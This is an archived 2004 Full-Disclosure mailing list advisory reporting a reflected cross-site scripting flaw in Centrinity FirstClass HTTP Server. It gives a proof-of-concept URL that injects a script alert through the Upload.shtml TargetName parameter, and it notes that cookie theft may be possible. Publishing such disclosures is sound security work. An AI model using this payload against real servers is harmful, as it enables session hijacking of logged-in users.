[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-Disclosure] Centrinity FirstClass HTTP Server Cross Site Scripting

To: support@xxxxxxxxxxxx
Subject: [Full-Disclosure] Centrinity FirstClass HTTP Server Cross Site Scripting
From: "Richard Maudsley" <r.i.c.h@xxxxxxxxxxxxxxx>
Date: Mon, 22 Mar 2004 19:30:03 +0000

Product: FirstClass HTTP Server
Developer: Centrinity
URL: http://www.centrinity.com

Description: Injected code is rendered in the context of the vulnerable
page.

Exploit:
http://[TARGET]/.Templates/Commands/Upload.shtml?TargetName=<script>alert('XSS')</script>

It may be possible to steal cookies from users who are logged into the
system.

It is likely that other pages are also vulnerable.

As usual, OpenText will not follow up this report, and it can be filed away
with numerous other unpatched FirstClass bugs, hacks and exploits:
http://search.securityfocus.com/swsearch?query=firstclass&metaname=swishtitle

Enjoy,
Richard Maudsley
www.mindblock.org

hey, jaw :)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Prev by Date: [Full-Disclosure] ICANN vs Verislim
Next by Date: [Full-Disclosure] ALLO ALLO WS_FTP Server
Previous by thread: [Full-Disclosure] ICANN vs Verislim
Next by thread: [Full-Disclosure] ALLO ALLO WS_FTP Server
Index(es):
- Date
- Thread